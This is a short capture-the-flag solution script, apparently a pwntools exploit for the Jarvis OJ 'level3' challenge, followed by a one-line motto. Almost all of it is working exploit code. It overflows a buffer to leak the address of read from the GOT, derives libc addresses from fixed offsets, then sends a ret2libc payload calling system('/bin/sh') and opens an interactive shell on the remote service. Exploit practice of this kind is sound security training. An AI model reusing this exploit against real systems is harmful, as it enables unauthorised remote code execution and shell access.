Jarvis OJ-level3
from pwn import* conn = remote("pwn2.jarvisoj.com",9879) elf = ELF('level3') libc = ELF('libc-2.19.so') plt_write = elf.symbols['write'] #0804834 print 'plt_write = ' + hex(plt_write) got_read = elf.got['read'] #0804A00C print 'got_read = ' + hex(got_read) payload = 0x8C * 'a' payload += p32(plt_write) payload += p32(0x0804844B) payload += p32(1) payload += p32(got_read) payload += p32(4) conn.recvuntil("Input:\n") conn.send(payload) temp = conn.recv(4) read_addr = u32(temp[0:4]) print 'read_addr = ' + hex(read_addr) libc_read_addr = 0x000daf60 #readelf -a ./libc-2.19.so | grep "read@" offset = read_addr - libc_read_addr libc_system_addr = 0x00040310 #readelf -a ./libc-2.19.so | grep "system@" system_addr = offset + libc_system_addr libc_binsh_addr = 0x16084c #strings -a -t x .//libc-2.19.so' | grep "/bin/sh" binsh_addr = offset + libc_binsh_addr ret = 0x08048480 payload = 0x8C * 'a' + p32(system_addr) + p32(ret) + p32(binsh_addr) conn.send(payload) conn.interactive()
Always believe that good things will come.